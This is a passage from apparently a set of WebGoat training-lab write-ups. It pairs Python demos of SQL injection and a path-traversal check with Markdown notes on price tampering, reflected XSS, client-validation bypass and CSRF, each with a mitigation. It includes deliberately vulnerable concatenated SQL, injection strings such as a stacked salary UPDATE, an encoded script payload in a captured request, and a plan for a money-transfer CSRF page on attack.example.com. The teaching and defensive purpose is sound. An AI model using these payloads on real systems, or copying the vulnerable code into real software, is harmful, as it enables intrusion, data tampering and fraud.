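    sql = "SELECT last_name, first_name FROM employees WHERE last_name = '" + last_name + "'"
    return con.execute(sql).fetchall()


def search_param(con, last_name):
    """Fixed: the value is bound as a parameter and can only ever be compared,
    never parsed. The same change is what stops the blind variants (16, 17)."""
    sql = "SELECT last_name, first_name FROM employees WHERE last_name = ?"
    return con.execute(sql, (last_name,)).fetchall()


def update_concat(con, userid, salary):
    """Vulnerable (challenge 13/14 pattern): a sink that accepts stacked
    statements, so text after the smuggled ';' runs as a second statement."""
    con.executescript("UPDATE salaries SET salary=" + str(int(salary)) +
                      " WHERE userid='" + userid + "';")


def update_param(con, userid, salary):
    """Fixed: execute() with parameters runs exactly one statement."""
    con.execute("UPDATE salaries SET salary=? WHERE userid=?", (salary, userid))


def salaries(con):
    return dict(con.execute("SELECT userid, salary FROM salaries ORDER BY userid"))


def demo():
    search_input = "Smith' OR 1=1 --"                                   # challenge 11
    update_input = "jsmith'; UPDATE salaries SET salary=2 WHERE userid='jsmith"  # challenge 13
    out = {}
    con = make_db()
    out["concat_rows"] = len(search_concat(con, search_input))   # every row
    out["param_rows"] = len(search_param(con, search_input))     # no such last name
    update_concat(con, update_input, 1)
    out["after_concat"] = salaries(con)                           # jsmith -> 2
    con = make_db()
    update_param(con, update_input, 1)
    out["after_param"] = salaries(con)                            # untouched
    return out


if __name__ == "__main__":
    print(demo())
```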
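For challenge 2 above, an added example (not the write-up's code nor WebGoat's) of the server-side check its mitigation asks for: an allow-list for the served directory plus a containment check on the resolved path, run against the write-up's `File=../secret.txt` input. The directory layout mirrors the write-up (lesson_plans/secret.txt next to lesson_plans/English/) but is constructed in a temporary directory; the lesson file names and the symlink case are assumptions.

```python
import os
import tempfile

# Constructed allow-list of the lessons the application is meant to publish.
ALLOWED = {"Lesson1.html", "Lesson3.html"}


def resolve_lesson(base_dir, requested, allow=ALLOWED):
    """Absolute path to serve, or None if the request must be refused.

    base_dir is the only directory files may be read from (the write-up's
    lesson_plans/English). Two independent layers:
      1. the explicit allow-list the application already had for that directory;
      2. containment of the *resolved* path, so '../', absolute paths and
         symlinks leading out of base_dir are all refused the same way.
    Pass allow=None to see what layer 2 catches on its own.
    """
    name = requested.replace("\\", "/")
    if allow is not None and name not in allow:
        return None
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:   # resolved outside root
        return None
    if not os.path.isfile(target):
        return None
    return target


def is_served(base_dir, requested, allow=ALLOWED):
    return resolve_lesson(base_dir, requested, allow) is not None


def build_layout():
    """Constructed copy of the write-up's tree in a temp dir.
    Returns (english_dir, symlink_created)."""
    top = tempfile.mkdtemp()
    plans = os.path.join(top, "lesson_plans")
    english = os.path.join(plans, "English")
    os.makedirs(english)
    with open(os.path.join(english, "Lesson1.html"), "w") as f:
        f.write("<html>lesson</html>")
    with open(os.path.join(plans, "secret.txt"), "w") as f:
        f.write("secret")
    # Lesson3.html is on the allow-list but is a symlink to the secret file:
    # layer 1 lets it through, layer 2 does not.
    try:
        os.symlink(os.path.join(plans, "secret.txt"),
                   os.path.join(english, "Lesson3.html"))
        linked = True
    except OSError:
        linked = False
    return english, linked


if __name__ == "__main__":
    d, _ = build_layout()
    print(is_served(d, "Lesson1.html"), is_served(d, "../secret.txt"))  # True False
```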
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge4.md:
--------------------------------------------------------------------------------
## Vulnerability:

The price of the HDTV is sent as POST data in a hidden form field ('Price'), so it is user controlled.

## Exploitation:
I used the 'Live HTTP headers' Firefox add-on to modify the price field to 0.99 and purchased the product for the new price :)

## Mitigation:
The price value should be stored on the server side. User input in POST (and of course in GET) requests can't be trusted because it can be trivially modified.

In general, user input can't be trusted and needs to be validated on the backend before use.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge5.md:
--------------------------------------------------------------------------------
## Vulnerability:

There are two issues:

1) There is no input validation of the data provided by the user via the HTML form, so malicious input can be provided. In consequence, a reflected XSS attack is possible.

2) The email recipient is controlled by the user and not validated on the server side, so a malicious user can send email to an arbitrary person using the given HTML form.

## Exploitation:

In the 'Questions or Comments:' form, send malicious JavaScript code; for testing purposes:
```

```

This will be executed by the webgoat admin when reading the email.

To deliver the malicious JavaScript payload, additionally modify the 'to' field in the HTML form.
I've used the 'Live HTTP headers' Firefox add-on for this purpose, sending the following request:

```
Host: webgoat.hacking-lab.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://webgoat.hacking-lab.com/attack?Screen=47&menu=1700
Cookie: JSESSIONID=3B42A5BADB7D88877255309F1E2230D1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 109

subject=Comment+for+WebGoat&to=ciec%40owasp.org&msg=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT=Send%21
```

## Mitigation:

1) Use an input validation library or implement your own solution for defense against XSS attacks (OWASP ESAPI can be used, or the OWASP XSS Prevention Cheat Sheet as a guide for implementing your own solution).

2) It should be possible to send email only to webgoat@owasp.org (the 'to' field in the HTML form is not needed, or it should be validated on the server side).
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge6.md:
--------------------------------------------------------------------------------

## Exploitation:

Here's the HTTP request which violates client validation and which I've sent to the server:

```
Host: webgoat.hacking-lab.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://webgoat.hacking-lab.com/attack?Screen=17&menu=1700
Cookie: JSESSIONID=7DC802DCDB873DB1EC4E16008085AA75
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

field1=abcD&field2=1234&field3=abc,+123+ABC&field4=seven+sto&field5=90210cos&field6=ble90210-1111&field7=ble301-604-4882
```

The request was sent using the Firefox Live HTTP Headers add-on; an intercepting proxy like ZAP or Burp could also be used.

As seen in the body of the request, form content which violates the client-side filter (the JavaScript validate() function) was sent.

## Mitigation:

Client-side validation can be used for performance reasons (to avoid requests to the server) but never for security reasons, because it can be trivially evaded using an intercepting proxy or by sending the request directly without a browser (with curl, for example). All untrusted input data needs to be validated on the server side - always.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge7.md:
--------------------------------------------------------------------------------

## Vulnerability:

As previously, client-side validation (this time in the form of HTML restrictions) is only respected by the browser, so it's not a security measure. One can trivially send a request which sets arbitrary values for the inputs in the form, as shown below.

## Exploitation:

I used ZAP to intercept the Firefox request, modified the request (see my request below) & resent it.

```
POST http://webgoat.hacking-lab.com/attack?Screen=51&menu=1700 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Referer: http://webgoat.hacking-lab.com/attack?Screen=51&menu=1700
Cookie: JSESSIONID=BE78568F44EF325354FDF39A12E0E7AC
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Host: webgoat.hacking-lab.com

select=sdf&radio=sdfdsf&checkbox=sdfn&shortinput=sdfsdfsdf&disabledinput=sdfffff&SUBMIT=sdfsdfsdddfsdfsdfsdf
```

## Mitigation:

HTML restrictions are only enforced on the client side (by the browser). Server-side validation is needed to make sure that only allowed input was provided.
--------------------------------------------------------------------------------
/hacking-lab.com/webgoat/challenge8.md:
--------------------------------------------------------------------------------
## Vulnerability:

The money transferring mechanism on this site is vulnerable to CSRF attacks.

CSRF takes advantage of the inherent statelessness of the web to simulate user actions on one website (the target site) from another website (the attacking site).

## Exploitation:

The actual attack would consist of the following 2 steps:

1) Preparing a malicious HTML/JavaScript site that performs a silent money transfer & hosting it somewhere. For example: a CSRF html file on the attacker's server (http://attack.example.com/csrf.html):

```

```

This site will automatically (when loaded) transfer 999 to the attacker's account number (123)


2) Enticing the owner of the bank account (social engineering, phishing, etc.) to visit a site which has a reference to csrf.html (for example: `